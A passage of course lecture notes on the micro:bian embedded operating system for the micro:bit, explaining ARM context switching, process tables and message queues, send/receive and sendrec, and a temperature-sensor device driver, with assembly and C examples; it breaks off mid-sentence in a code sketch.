The helper routines isave and irestore implement the saving of that part of the state that is not saved by the hardware on interrupt. In the interests of full disclosure, here is code for isave:

@@@ isave -- save context for system call
    .macro isave
    mrs r0, psp                 @ Get thread stack pointer
    subs r0, #36
    movs r1, r0
    mov r3, lr                  @ Preserve magic value 0xfffffffd
    stm r1!, {r3-r7}            @ Save low regs on thread stack
    mov r4, r8                  @ Copy from high to low
    mov r5, r9
    mov r6, r10
    mov r7, r11
    stm r1!, {r4-r7}            @ Save high regs in thread stack
    .endm                       @ Return new thread sp

In this code, the first instruction fetches the process stack pointer into r0: the mrs instruction (Move to Register from Special) can be used to access multiple special registers inside the processor, and has a counterpart called msr that we'll use later. Also new here is the stm instruction that (like push) stores multiple registers in consecutive words of memory. Unlike push, this can use an arbitrary register for the address where the values are stored, and it modifies that register (that's what the ! means) by the size of the data saved – 20 bytes for the first stm here. Annoyingly, however, unlike push it increments the address rather than decrementing it, and that's the reason r0 is first moved down by 36 bytes, the size of the whole nine-word frame, so that the two stm instructions can store upwards from there. Also a bit irritating is the fact that stm cannot store from the high registers, so we must laboriously move r8–r11 into r4–r7 before saving them. We are really earning our money here.

You can guess the implementation of irestore: it is a bit easier because the ldm instruction that's dual to stm does go in the direction we want, and it ends with msr psp, r0 to set the process stack pointer.

And here is the layout of the frame that is pushed by hardware and software onto the stack of the suspended process:

--------------------------------------
16  PSR  Status register
15  PC   Program counter
14  LR   Link register
13  R12
12  R3
11  R2           (Saved by hardware)
10  R1
 9  R0   Process argument
--------------------------------------
 8  R11  
 7  R10
 6  R9
 5  R8           (Saved manually)
 4  R7 
 3  R6 
 2  R5
 1  R4
 0  MAGIC
--------------------------------------

It's right to save this information on the process stack, because the register values are specific to the process, and will be needed again precisely when the process is resumed. The address at which r8 has been saved is the one that is recorded as the stack pointer of the suspended process.

The function system_call is written in C, and is the entry point of the operating system for system calls written with svc. Its heading is

unsigned *system_call(unsigned *psp),

showing that it is passed as a parameter the process stack pointer of the process that is being suspended, and returns as a result the stack pointer for the process to be resumed. As we'll see later, the system_call function can decode the state of the suspended process to find out what system call (such as yield(), send(), receive()) was requested, and what its parameters were.

Note: Update needed for changed micro:bian API.

Here's an outline of the implementation of system_call.

#define arg(i, t) ((t) psp[R0_SAVE+(i)])

/* system_call -- entry from system call traps */
unsigned *system_call(unsigned *psp)
{
    short *pc = (short *) psp[PC_SAVE]; /* Program counter */
    int op = pc[-1] & 0xff;      /* Syscall number from SVC instruction */

    /* Save sp of the current process */
    os_current->sp = psp;

    switch (op) {
    case SYS_YIELD:
        make_ready(os_current);
        choose_proc();
        break;

    case SYS_SEND:
        mini_send(arg(0, int), arg(1, int), arg(2, message *));
        break;

        ...
    }

    /* Return sp for next process to run */
    return os_current->sp;
}

This implementation finds the program counter value for the suspended process by reaching into the saved state on its stack; later it will find the system call arguments in a similar way. Then it looks at the svc instruction that invoked the operating system (at offset −2 bytes from the PC) to find out what system call this is. The stack pointer for the process just suspended is saved in the process table entry os_current. Then a switch statement selects an action appropriate to the system call: switching to a different process, sending a message, and so on. As part of this action, the function choose_proc() may be used to select a different process as the value of os_current: this happens directly in the case of the yield() system call, and may happen indirectly with send() or receive(), particularly if the current process becomes blocked. The system_call() function returns the SP value of this new process to svc_handler in r0, and it's this SP value that is used to resume the process that is now selected as current.

It's up to the operating system to decide (as a matter of policy) which process should get to run next. What we're concentrating on for the moment is the mechanism by which that policy is put into effect. If the operating system wants the currently executing process to carry on, it can simply return the same stack pointer it received, and the context switching mechanism will then return to the same process that it suspended when the call was made.

The explanation above captures well enough what happens once a program is running, but any explanation will be unsatisfying if it doesn't reveal what happens when the program is starting up. There are two aspects to this: how each process starts, and how the entire system starts.

The operating system resumes each process by the return-from-interrupt mechanism, and that applies also to the time when the process first starts up. To provide for this, when the process is set up it is given a fake exception frame on its stack. This is done in the function start in microbian.c, which depends on the frame layout shown above. It sets up the fake frame so that

  • r0 contains the integer argument that will be passed to the process.
  • pc contains the address of the function body. The LSB should not be set, or the result is UNPREDICTABLE (ARM manual, page B1-201), though in practice this causes no problems.
  • The value of psr doesn't matter much, but it should have the bit set that indicates Thumb mode. (There's a great sense of relief when you finally get such details right.)
  • The value of lr determines what happens if the process body should ever return. By setting it to the address of exit, we arrange for the process to terminate cleanly in this case.
  • Other registers can have arbitrary values, so it's safe to leave them as zero.

These values, saved on the initial stack for the process, ensure that when the process is first activated by the return-from-interrupt mechanism, it starts to run the process body with the supplied argument.
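
In code, the relevant part of start might be sketched as follows, for a process record p with body body and argument arg. The offsets R0_SAVE and PC_SAVE appear in system_call above; FRAME_WORDS (17, for offsets 0–16 in the layout shown earlier) and the other offset names are assumptions matching that layout:

unsigned *frame = (unsigned *) ((char *) p->stack + p->stksize) - FRAME_WORDS;
frame[MAGIC_SAVE] = 0xfffffffd;     // Magic LR value for return from interrupt
frame[R0_SAVE] = (unsigned) arg;    // Argument passed to the process body
frame[LR_SAVE] = (unsigned) exit;   // Terminate cleanly if the body returns
frame[PC_SAVE] = (unsigned) body;   // Start executing at the body
frame[PSR_SAVE] = 0x01000000;       // Thumb bit set; other bits zero
p->sp = frame;                      // Record as the process's saved stack pointer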

We also want to know how the whole system starts. The first process to run is a special process IDLE, belonging to the operating system itself, that will later become the process that runs when there is no other process ready to run. It contains an infinite loop with the only wfe instruction in the whole system. The idle process is created by a function __start() that is called very early in the start-up sequence.

/* __start -- start the operating system */
void __start(void)
{
    /* Create idle task as process 0 */
    idle_proc = create_proc("IDLE", IDLE_STACK);
    idle_proc->state = IDLING;
    idle_proc->priority = P_IDLE;

    /* Call the application's setup function */
    init();

    /* The main program morphs into the idle process. */
    os_current = idle_proc;
    set_stack(os_current->sp);
    yield();

    idle_task();
}

void idle_task(void)
{
    /* This process only runs again when there's nothing to do. */
    while (1) pause();
}

The function __start() first creates the idle process, then calls the user-supplied function init() to create the other processes in the system. After this, the processor switches (via set_stack()) into the mode where there are separate stacks for the operating system and for processes. The call to yield() then lets the operating system choose other, genuine, processes to run, and after that the idle process runs only when there are no other processes ready: it falls into idle_task(), an infinite loop that repeatedly calls pause() to wait for the next interrupt.

The helper routine set_stack() uses a couple of special instructions to do its job: msr allows values to be moved into special registers in the processor like psp. Setting the control register to 2 enables the use of psp as the stack pointer, and the isb instruction is there to ensure that no instructions in the pipeline use the old stack pointer.

set_stack:
    msr psp, r0             @ Set up the stack
    movs r0, #2             @ Use psp for stack pointer
    msr control, r0
    isb                     @ Drain the pipeline
    bx lr

Summary: By saving the whole state of a process on its stack, we can implement context switches from a process to the OS kernel and then to a different process. There's always some system-dependent detail to this, and a bit of assembly-language cleverness, but in outline it is always similar.

This lecture covers the mechanism that supports multiple, interleaved processes; we have not yet touched on the separate policy that determines which process should run at each time.

Context

More than any other code shown in this course, the context switch code shown here is architecture-dependent. Every machine capable of supporting multitasking makes it possible to save the machine state in this way, and restore it in order to revive a suspended process. Using the interrupt mechanism uniformly to enter the operating system is a very common approach.

Context switch for a simple machine like a microcontroller is itself quite simple. But for a more complex machine with an MMU, it is a more far-reaching operation. Each process has its own mapping from a virtual address space to physical addresses in the RAM that makes it appear to the process that it alone occupies the memory of the machine, and prevents any process from interfering with the memory occupied by others. When control is transferred from one process to another, or from a process to the operating system, this mapping must also be updated. Simpler machines may require the memory occupied by each process to occupy a contiguous region in the RAM, but more sophisticated machines divide the memory into pages that may be arbitrarily arranged to form the memory belonging to a process, and some of them may be stored not in RAM but on disk, to be retrieved by the operating system when the process needs access to them. All this adds up to quite a lot of state that must be saved and restored at a context switch.

A refinement

The above account describes a feasible scheme for implementing interrupts and context switch, but as it is currently implemented, micro:bian does something a little more refined. System calls do indeed cause a full context switch as described, with hardware and software collaborating to save the whole process state. On the other hand, interrupts do only a partial context switch, using the hardware supported mechanism to save some state and call an interrupt handler subroutine. If that subroutine – part of the operating system – decides that a full context switch is needed, then it uses the machine's mechanism for a "pending supervisor call" to request one. When this PendSV feature is activated, a special kind of interrupt is generated, and the operating system provides a handler for this interrupt that saves the complete state and performs the desired context switch.

The hardware optimises things so that this two-stage process for handling an interrupt that generates a message is not much slower overall than the simpler scheme of saving all the state immediately. The chief advantage of this more refined scheme is that it is possible to install a specially-written interrupt handler for a particularly time-critical interrupt and have it get control more quickly than under the simpler scheme. In the case where no message need be sent, the whole process of handling an interrupt can be made much faster in this way.

Lecture 15

Lecture 15 – Implementing processes and messages

Process table. Ready queue. Send and receive.

Context switching as implemented in the previous lecture gives us a platform on which we can implement a process scheduler with no further magic: the scheduler is simply a program that receives calls to send, receive and other, similar, functions and decides the order in which processes should run. In this lecture, we look at the data structures and the algorithms that are used to make these decisions.

Process table

micro:bian keeps information about each process in a structure (source).

typedef struct _proc *proc;

struct _proc {
    int pid;                 /* Process id */
    char name[16];           /* Name for debugging */
    unsigned state;          /* SENDING, RECEIVING, etc. */
    unsigned *sp;            /* Saved stack pointer */
    void *stack;             /* Stack area */
    unsigned stksize;        /* Stack size (bytes) */
    int priority;            /* Priority: 0 is highest */
    
    proc waiting;            /* Processes waiting to send */
    int pending;             /* Whether INTERRUPT message pending */
    int msgtype;             /* Message type to send or receive */
    message *message;        /* Pointer to message buffer */

    proc next;               /* Next process in ready or send queue */
};

/* Possible state values */
#define DEAD 0
#define ACTIVE 1
#define SENDING 2
#define RECEIVING 3
#define SENDREC 4
#define IDLING 5

The gist of this is that each process will be represented by a structure containing certain fixed fields. Space for the structure will be allocated when a process is created, not here. Two of the fields, waiting and next, are pointers to other processes, and by means of them we can construct linked lists of process records, without having to use malloc or its equivalent to allocate storage dynamically: that's good, because dynamic storage allocation is difficult to do well in limited memory, and potentially too slow to incorporate in the heart of our operating system.

Each process has

  • an integer process id.
  • a string name, copied from the string given when the process was created. This is used in a function that dumps the state of all processes (a counterpart to the ps command of Unix). Also the name of the current process could be printed in case of a panic, just before the Seven Stars of Death appear.
  • an integer state that has one of the values listed later.
    • DEAD indicates a process that has exited. It is also the value present in slots of the table that have never been used.
    • ACTIVE indicates a process that is ready to run. The process is either the current process, or the ready queue waiting to become current.
    • SENDING indicates that the process is waiting to send to another; the process will appear in the sending queue of the destination.
    • RECEIVING indicates that the process is waiting to receive a message; the msgtype field specifies what messages it is willing to accept.
    • SENDREC indicates a call to sendrec, combining the functions of send and receive.
    • IDLING indicates the idle process, which runs when no other process is ready.
  • three pieces of information about the stack of the process, which contains all its state: the current stack pointer sp, the base of the stack area stack, and its size stksize. The base and size of the stack are used in the process dump, which attempts to find out how much of the allocated space has actually been used. The stack pointer is of more vital importance, because it is needed in order to resume the process after a system call.
  • a small integer priority for the process. Possible values are from 0 to 3, with 0 (the most urgent) reserved for processes that are connected to interrupts, 1 and 2 (with symbolic names P_HIGH and P_LOW) allowed for normal processes, and 3 reserved for the idle process, which runs only when no other process is ready.
  • some fields that are used to save information about processes that are waiting to send or receive.
    • if waiting is not null, it points to a list of processes waiting to send to this one.
    • pending is non-zero if an interrupt message is waiting to be delivered to this process.
    • if the process is in state RECEIVING, then msgtype determines what types of message the process is willing to receive: either a specific message type, or the special value ANY.
    • if the process is in state SENDING or RECEIVING (or SENDREC), then message is a pointer to the message buffer passed in the call to send or receive (or sendrec). This buffer may be in the stack space of the process, and may be NULL if there is no additional data to pass as part of the message.
  • a pointer next that can be used to link the process into a queue, containing either processes waiting to run, or processes waiting to send a message.

Ready queue

The ready queue

There are three queue structures, corresponding to priorities 0, 1, and 2. There's no need for a queue structure for priority level 3, because that level always contains exactly one process, the idle process, which is always ready to run (source).

Each queue structure has two pointers: one to the head of the queue and another to the tail. If the queue is empty, then both of these pointers are null, and if the queue contains one process, then both head and tail point to it. In each case, it's quick to add a process to the end of the queue, or to remove a process from the front, as the sketch below shows.
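
A sketch of the queue structure and these two constant-time operations; the names are invented for the illustration:

typedef struct {
    proc head, tail;                // Both null when the queue is empty
} queue;

static void enqueue_ready(queue *q, proc p) {
    p->next = NULL;
    if (q->head == NULL)
        q->head = q->tail = p;      // First process in an empty queue
    else {
        q->tail->next = p;          // Link after the old tail
        q->tail = p;
    }
}

static proc dequeue_ready(queue *q) {
    proc p = q->head;
    if (p != NULL) {
        q->head = p->next;
        if (q->head == NULL)
            q->tail = NULL;         // The queue has become empty
    }
    return p;
}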

In order to find the ready process with the highest priority, we need to look at each queue structure in turn, but that doesn't take long if there are only a few different priority levels. With a more elaborate system of priorities, a more carefully designed data structure might be needed; but the number of processes might have to grow quite large before clever data structures gained any advantage, even if the running time of operations on them was asymptotically better.

All the processes that are on a ready queue are in the ACTIVE state.

Processes queueing to send

There are other queues for processes that are waiting to send a message and are in the SENDING state. In fact, each process has two pointers in its record: one called next for linking it into a queue, and another called waiting that points to the head of a queue of processes waiting to send to it. Because these queues are usually short, we don't bother with a pointer to the tail of the queue, but just find it when we want by chaining along the list.
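
Appending to such a tail-less queue by chaining along it might look like this sketch; add_sender is a name invented here, and in the real code the corresponding step is the enqueue(pdest) called from mini_send below:

static void add_sender(proc pdest, proc p) {
    p->next = NULL;
    if (pdest->waiting == NULL)
        pdest->waiting = p;         // The queue was empty
    else {
        proc q = pdest->waiting;
        while (q->next != NULL)
            q = q->next;            // Chain along to find the tail
        q->next = p;
    }
}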

In the picture, there is an ACTIVE process that is busy doing something, and three processes are waiting to send it a message when it has finished. One of these processes itself has a third process waiting to send to it: for that to happen, the first process must accept the message from the second process, allowing the second process to proceed, and the second process must then call receive to allow the third process to deliver its message.

In the diagram, there is also a process that is in RECEIVING state, waiting to receive a message. It is not linked to any sender, but potential senders know its process id, and can get in touch when they are ready to send. In addition, there is a process that is in RECEIVING state but nevertheless has another process waiting to send to it. That process must have asked to receive a message with a specific type, and the process that is waiting wants to send a different type of message. The receiving process will have to receive first the message it is waiting for; then perhaps it will call receive again and accept the message from the waiting process.

As the diagram shows, any process that is not DEAD (or the idle process), and is not currently waiting to receive from ANY, can have a queue of other processes waiting to send. Each waiting process is in SENDING state (so is not on the ready queue), and can be on the queue of only one process – the one it is hoping to send to. Therefore, we can manage with only one next link for each process, and we don't have to allocate storage dynamically to cope with any eventuality that might arise.

Not shown here

There are a couple of possibilities not shown in these diagrams: they add only details to the story, so do not need to be included in a first telling.

As well as send and receive, there is an operation sendrec(dst, type, msg) that combines both, equivalent to send(dst, type, msg) followed by receive(REPLY, msg). This single operation neatly captures the idiom of sending a request to a server and waiting for a reply. Besides the brevity that it offers, it is also a bit more efficient, and avoids a potential problem known as priority inversion. Supporting sendrec means adding another process state, called SENDREC. A process in this state is waiting to send to some destination, and will be on the destination's queue. When it has succeeded in sending, its state becomes RECEIVING, just as a process in state SENDING will enter state ACTIVE at the same moment.

As well as receiving a message from a process that is waiting in its queue, a driver process that calls receive can get an INTERRUPT message from the fictitious process HARDWARE. Such messages are not reflected in the queue of senders but by setting the pending flag for the process. If an interrupt is pending, then it jumps the queue and is delivered before any message from a waiting process.

Send and receive

When a process calls send, there are two possibilities.

  • If the destination process is in state RECEIVING, and it is prepared to accept a message of this type, then the message can be copied immediately, and both the sender and the receiver are now ready to run.
  • If the destination process is not waiting for a message of this type, then the sender must be suspended and join the destination's queue (at the end, it being a queue). Since the sender cannot continue, there must be a call to choose_proc to find another process to run.

When a process calls receive, three possibilities must be considered; a sketch of the code follows the list.

  • If the process is connected to an interrupt, and an interrupt is pending, then an INTERRUPT message should be delivered, and the process continues in order to service it.
  • If not, and some other process is waiting to send to this one, then the message can perhaps be delivered immediately. If the process is hoping to receive a specific type of message, we must search the queue to see if a process is waiting to send a message of the right type; otherwise, the first process on the queue is taken. After the message is copied, both sender and receiver are ready to run. The need to search the queue here means that we must accept that some operations on sender queues will take time proportional to the length of the queue, and partially justifies traversing the queue also to add a process to the end.
  • If there is no acceptable process waiting, then the caller must be suspended in state RECEIVING.

Both send (implemented by mini_send) and receive (implemented by mini_receive) are system calls that are handled by the operating system after it has been entered by the system call mechanism. System calls and all interrupts have the same priority in micro:bian, so we can be sure that the operations on queues needed to implement the system calls will not be interrupted: this is much simpler than generally allowing interrupts during system calls and disabling them only when necessary, but it means that interrupts will occasionally be disabled for a relatively long time.

System calls arrive in the operating system via the interrupt mechanism at the function system_call (source), which decodes the arguments of the call by delving into the exception frame. Going into more detail, we can look at a function mini_send (source) that implements the send operation and is invoked from the system call interface.

Note: Update needed for changed micro:bian API.

/* mini_send -- send a message */
static void mini_send(int dest, int type, message *msg)
{
    int src = os_current->pid;

    if (dest < 0 || dest >= os_nprocs || os_ptable[dest]->state == DEAD)
        panic("Sending to a non-existent process %d", dest);

    proc pdest = os_ptable[dest];

The function gets the destination in the form of a process number: the process table is entirely private to the scheduler, and pointers to process records are never passed to the client program. The implementation of send begins by finding the process id src of the current process, which is sending the message, and also for brevity a pointer pdest to the process record for the destination.

What happens next depends on whether the destination process is waiting to receive a message with this type.

    if (accept(pdest, type)) {
        /* Receiver is waiting: deliver the message and run receiver */
        deliver(pdest->message, src, type, msg);
        make_ready(pdest);
        make_ready(os_current);
    } 

If so, then we can immediately copy across the message and fill in src as the sender field and type as the type field of the message: this is done by deliver(), which takes into account the possibility that pdest->message or msg or both may be NULL. Filling in the sender automatically is a matter of convenience for us, but in Minix it is part of the security system, guarding against forgery. Finally we call make_ready() on both the destination and the current (source) processes to add them to a queue, each according to its priority. This is the simplest way of ensuring that the next process is chosen in a way that satisfies the scheduling policy – but note that the destination goes on the queue first, since it is the process most likely to have real work to do.

    else {
        /* Sender must wait by joining the receiver's queue */
        set_state(os_current, SENDING, type, msg);
        enqueue(pdest);
    }

If the destination is not waiting for the sender's message, then the sender must block until the destination can accept the message. We record the message type and the address of the message buffer as part of the sender's state, set its status to SENDING, and add the sender to the queue of processes associated with the receiver.

    choose_proc();
}

Finally, whichever case applied, we need to choose a new process to run. If the message has been delivered, then it's more than likely the destination process will be chosen; otherwise the source is blocked, and another process must run, perhaps the destination, perhaps some other process.

Here's a simple version of mini_receive, which implements the receive system call. It first checks whether an INTERRUPT message is pending, then searches the queue of waiting senders to see if any of them have a message of the right type. If neither of these works, then the receiving process must block and wait for a sender or interrupt to appear.

/* mini_receive -- receive a message */
static void mini_receive(int type, message *msg)
{
    /* First see if an interrupt is pending */
    if (os_current->pending && (type == ANY || type == INTERRUPT)) {
        os_current->pending = 0;
        deliver(msg, HARDWARE, INTERRUPT, NULL);
        return;
    }

    /* Now see if a sender is waiting */
    if (type != INTERRUPT) {
        proc psrc = find_sender(os_current, type);

        if (psrc != NULL) {
            deliver(msg, psrc->pid, psrc->msgtype, psrc->message);
            make_ready(os_current);
            make_ready(psrc);
            choose_proc();
            return;
        }
    }

    /* No luck: we must wait. */
    set_state(os_current, RECEIVING, type, msg);
    choose_proc();
}    

(This version of receive doesn't take into account that a message might be sent with sendrec.)

In describing the process of sending and receiving messages, we've used various simple subroutines like accept (which tests if a message is acceptable), make_ready (which puts a process on the right ready queue), and enqueue (which puts the current process on the sender queue of another process). All these subroutines are easy to implement using the representation of processes, including the linked lists formed by the waiting and next pointers – see the source code for details. There's no need to worry about the time taken by subroutine calls, because GCC is able to substitute the subroutine bodies inline.
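For illustration, here are sketches of accept and find_sender in the same style – the bodies are my reconstruction, not the authoritative source. Note that find_sender must unlink the chosen sender from the queue as well as finding it.

/* accept -- test whether pdest is waiting for a message of this type */
static inline int accept(proc pdest, int type)
{
    return (pdest->state == RECEIVING
            && (pdest->msgtype == ANY || pdest->msgtype == type));
}

/* find_sender -- find and dequeue a waiting sender with an acceptable message */
static inline proc find_sender(proc pdest, int type)
{
    proc prev = NULL;

    for (proc psrc = pdest->waiting; psrc != NULL; psrc = psrc->next) {
        if (type == ANY || psrc->msgtype == type) {
            /* Unlink psrc from the queue of waiting senders */
            if (prev == NULL)
                pdest->waiting = psrc->next;
            else
                prev->next = psrc->next;
            return psrc;
        }
        prev = psrc;
    }

    return NULL;
}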

As an example, here's an implementation of enqueue(pdest), which hangs the current process on the end of the queue pdest->waiting of processes waiting to send to process pdest.

/* enqueue -- add current process to a receiver's queue */
static inline void enqueue(proc pdest)
{
    os_current->next = NULL;
    if (pdest->waiting == NULL)
        pdest->waiting = os_current;
    else {
        proc r = pdest->waiting;
        while (r->next != NULL)
            r = r->next;
        r->next = os_current;
    }
}

We expect very few processes to be simultaneously trying to send to the same receiver, so it's appropriate to use the simplest possible implementation – a singly linked list. If the queue is empty, then the function adds the current process as its only element. If the queue isn't empty, then it searches for the last process in the queue and adds the current process after it.

Lecture 16 – A device driver

Using documentation to write a driver for a simple device.

The Nordic chip on the micro:bit has a temperature sensor that measures the temperature of the processor die in units of 1/4° Celsius. The device consists of an analog circuit that exploits some temperature-dependent property of silicon, together with a dedicated A-to-D converter that digitises a reading. The A-to-D converter takes some time to settle, so there is a protocol where the processor initiates a reading, then must wait for an event that can be signalled by interrupt before getting the result. We will aim to write a device driver for the sensor, and provide a function

int temp_reading(void)

that can be called from any process to get an up-to-date temperature reading.

Reasons for having a separate device driver process:

  • We can manage concurrent access from multiple processes and prevent a new reading being initiated before the previous one is finished.
  • We can connect to the interrupt from the device and react when a reading is complete.

The hardware

Two pages from the nRF51822 manual describe the hardware of the temperature sensor. All the device registers are addressable at offsets from the base address TEMP = 0x4000C000.

  • There is a 'task' START = 0x000 that initiates a reading when triggered with TEMP_START = 1.
  • There is an 'event' DATARDY = 0x100 that indicates when the reading is ready (with TEMP_DATARDY == 1).
  • There is an interrupt enable register INTEN = 0x300 in which bit TEMP_INT_DATARDY = 0 enables the interrupt on the DATARDY event.
  • There is a data register TEMP = 0x508 that contains the value of the reading when ready.

Note: This syntax for device descriptions is obsolete.

We can describe this layout by adding suitable definitions to the header file hardware.h. Actually, kind Mike has already written them. We need to strain the rules of C to the limit to write this stuff – and I won't go into details, because most of the really hairy stuff is hidden in macros like _DEVICE and _REGISTER. What we need is the following (with unused registers elided):

/* Temperature sensor */
_DEVICE _temp {
/* Tasks */
    _REGISTER(unsigned START, 0x000);
/* Events */
    _REGISTER(unsigned DATARDY, 0x100);
/* Registers */
    _REGISTER(unsigned INTEN, 0x300);
    _REGISTER(unsigned VALUE, 0x508);
};

/* Interrupts */
#define TEMP_INT_DATARDY 0

#define TEMP (* (volatile _DEVICE _temp *) 0x4000c000)

Broadly speaking, this says that a _temp device has four registers at the offsets shown, all accessed as 4-byte unsigned integers. Then it says that a particular _temp device TEMP exists at the address 0x4000c000. This hardware address is linked behind the scenes with the irq TEMP_IRQ = 12, because of the c = 12 in 0x4000c000 – but that fact is not important.

The upshot of these definitions is that when we write (for example)

temp = TEMP_VALUE

in our program, that corresponds to fetching from the address 0x4000c508. If temp lives in r6, the equivalent machine code would be

ldr r0, =0x4000c508
ldr r6, [r0]

developing the address of the TEMP_VALUE register into r0, then loading from that address into r6.

Configuring the interrupt

There's nothing to set up about the temperature sensor itself: when triggered, it always does its job in the same way, with no variation that we can control. But we do have to configure the interrupt mechanism so that the completion of a reading results in an INTERRUPT message to our driver process. Here are the steps, following the flow from device to driver process.

  • First, we must tell the device to request an interrupt when a reading is ready. We do this by setting a bit (the only significant bit, as it happens) in the device's INTEN register.
TEMP_INTEN = BIT(TEMP_INT_DATARDY);
On other devices, there may be several potential causes of interrupts, and we can choose which causes will actually lead to an interrupt being requested.
  • Second, we must tell the interrupt controller to pass on interrupt requests from the device. There's a register NVIC_ISER that has one bit for each of the 32 different device interrupts, and setting the appropriate bit in that register makes the NVIC pass through the corresponding interrupt. So we write
enable_irq(TEMP_IRQ);

as an abbreviation for

NVIC_ISER = BIT(12);
This enables the appropriate interrupt. A detail: storing a 1 bit in NVIC_ISER enables the corresponding interrupt without disabling any others; to disable a specific interrupt, we store an appropriate 1 bit into its sister register NVIC_ICER. This pattern is found all over the place – in fact, the temperature device has two registers INTENSET and INTENCLR alongside the INTEN register that also have this behaviour, even in the futile case where they contain only one significant bit.
  • We might need to make sure that the processor is accepting interrupts, something that can be done with the call
intr_enable(); // (not needed)
which is an abbreviation for a special instruction that is written cpsie i in assembly language. But the processor starts up in a mode where interrupts are enabled, so we don't need to do anything specific for this device.

What we've had so far sets up the hardware so that interrupts will happen at an appropriate time. Under micro:bian, the interrupts will be handled by the general interrupt handler, which looks up the interrupt in a table and sends a message to the appropriate driver process.

  • So (third) we must register our process for the relevant interrupt with the system call
connect(TEMP_IRQ);
This fills in the PID of the current process in the os_handler table, and also raises the priority of the current process so that interrupts will be delivered promptly.

A cautious programmer might choose to put the call to connect() before the call to enable_irq(), so that any interrupt that was already pending will be delivered and not cause a panic. Then the device driver would have to be written so as to ignore spurious interrupts. In this case, it seems that the temperature sensor won't request an interrupt before it is started, so everything is safe.

We end up with the code

TEMP_INTEN = BIT(TEMP_INT_DATARDY);
connect(TEMP_IRQ);
enable_irq(TEMP_IRQ);

to include at the top of the device driver. The hardware setup could be put elsewhere, but the call to connect must come from the device driver process, because that's how the OS identifies which process wants to connect.

The driver process

Note: Update needed for changed micro:bian API.

Because we will deal with each request – starting the reading, waiting for it to be ready, then retrieving the value – before accepting another request, we can write the driver process in a particularly simple way, where the server loop deals with one complete request for each iteration, and a call receive(INTERRUPT, ...) in the body of the loop pauses until the hardware produces a reading.

static void temp_task(int arg)
{
    message m;
    int temp, client;

    ... setup as above ...

    while (1) {
        receive(ANY, &m);

        switch (m.type) {
        case REQUEST:
            client = m.sender;

            TEMP_START = 1;
            receive(INTERRUPT, NULL);
            assert(TEMP_DATARDY);
            temp = TEMP_VALUE;
            TEMP_DATARDY = 0;
            clear_pending(TEMP_IRQ);
            enable_irq(TEMP_IRQ);

            m.int1 = temp;
            send(client, REPLY, &m);
            break;

        default:
            badmesg(m.type);
        }
    }
}

There are a couple of layers to explain here: first, there's a server loop that accepts a request, carries it out, sends a reply, then loops around to accept another request. If we're content to complete the handling of one request before accepting another one, then this is sufficient, and we don't have to deal with interrupts in the main server loop.

After receiving a request, the process notes which process sent the request, so it can reply to the same process later. There follows a bit of code that uses the sensor hardware to get a temperature reading, then the process constructs a REPLY message with the reading in its int1 field, and sends that message back to the client. The relationship between client and server looks like a function call here: the client sends in a request, waits while the server does the work, then receives a reply before carrying on. This pattern of interaction is often called remote procedure call.

The code for carrying out a request is not hard to understand. First, we start the sensor taking a reading.

TEMP_START = 1;

Nothing more happens until the reading is done, and then we receive an interrupt message, so we can safely wait for the message to arrive.

receive(INTERRUPT, NULL);

(Note that we insist on an INTERRUPT message, so we don't accidentally receive another request at this point. Any client processes wanting to request a reading must wait, and they wait on the queue of processes that want to send to this one, with no explicit queue in our program needed. Also note that we can specify the second parameter of receive() as NULL if we are not interested in any data about the message received.)

When the interrupt arrives, we expect it is because the conversion is complete, so we write

assert(TEMP_DATARDY);

If the DATARDY event hasn't been signalled, then something has gone horribly wrong, and the failed assertion will result in the Seven Stars of Death.

At this point, the reading is available in the VALUE register of the device, so we fetch it and keep it in the local variable temp. (This is one of the few times a variable called temp is a good idea!)

temp = TEMP_VALUE;

Following that, we must reset the hardware ready for the next reading, and that mostly means re-arming the interrupt mechanism. That must be done in a specific order if we aren't going to trigger another interrupt by accident. First, let's remove the cause of the interrupt by resetting the DATARDY event.

TEMP_DATARDY = 0;

Second, because of the way the NVIC interacts with micro:bian's interrupt mechanism, we must clear the pending bit for the interrupt.

clear_pending(TEMP_IRQ);

That amounts to storing a 1 bit in the appropriate place in a special register NVIC_ICPR: details in hardware.h. Finally, it's safe to enable the interrupt request again.

enable_irq(TEMP_IRQ);

And now the reading is in the variable temp, and the interrupt hardware is set up for the next reading.

Client stub

Note: Update needed for changed micro:bian API.

Clients will obtain temperature readings by sending a message to the server and waiting for a reply that contains the reading. It's convenient to provide a little function temp_reading() that carries out this interaction for the client and returns the reading as its result. For the remote procedure call idiom of sending a request and waiting for the reply, we can use the sendrec system call.

int temp_reading(void)
{
    message m;
    sendrec(TEMP_TASK, REQUEST, &m);
    return m.int1;
}

Why use sendrec() here? There are three reasons: in order of increasing importance, (i) it is shorter than writing two separate calls; (ii) it is more efficient, because after the client process sends a request and suspends, the client does not need to run again before being ready to receive the reply; and (iii) using sendrec() avoids a situation called priority inversion, where a high-priority process with work to do is blocked because another, lower-priority, process needs to run first.

sendrec() and priority inversion

With separate send() and receive(), the sequence of events will be as follows.

  1. The client process calls send() and (we assume) immediately rendezvouses with the receive() call at the top of the server loop.
  2. Because the server process has higher priority than the client process, the client process is suspended on the ready queue and the server process starts to run.
  3. The server process performs a temperature reading. Let's assume that during this time, other processes run and the client (despite being active) does not.
  4. The server calls send() to return a reply to the client. At this point, if the client had used sendrec(), the kernel would know that the client was waiting to receive a reply, the message could be transferred immediately, and the server (with its higher priority) could continue to run.
  5. If the client has not used sendrec(), then the server blocks at its call to send() for the reply, and must wait until the client process is scheduled again; at that point, the message is transferred and both server and client are made active. Because the server process has higher priority, it is selected to run again.

The upshot is that, unless sendrec() is used, there are at least two additional context switches between server and client, and a situation could arise where the server was needlessly blocked for a while, waiting for a lower-priority process to be scheduled. This priority inversion does no harm in this example, because once the temperature reading is delivered, the server process has nothing more to do before waiting for the next request; but in examples where events can happen continuously, it can create a problem.

There is no way of avoiding the problem by writing the client program in a different way, unless the calls to send() and receive() are combined. When the client program is suspended, that happens inside the system call stub for send(); on being resumed, the process will return from the send() stub, prepare the arguments, and immediately call the receive() stub and enter the operating system again. Using sendrec() instead of send() followed by receive() short-circuits this sequence of events; having sent its message, the client immediately enters the RECEIVING state to wait for the reply, without having to run again first.

To implement sendrec(), we need to add another process state, SENDREC, in case the client process must wait for the server process to be ready to receive; the difference between SENDREC and SENDING is that when it has sent its message, a process in state SENDING enters the ACTIVE state, and a process in state SENDREC enters state RECEIVING, always blocking until the server sends a reply. The implementation of receive() must change to reflect this distinction.
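As a sketch (my reconstruction, not the real source), the point in mini_receive where a waiting sender has just had its message delivered might become:

/* After delivering the message from a waiting sender psrc */
if (psrc->state == SENDREC)
    /* A sendrec() caller goes straight to waiting for its reply */
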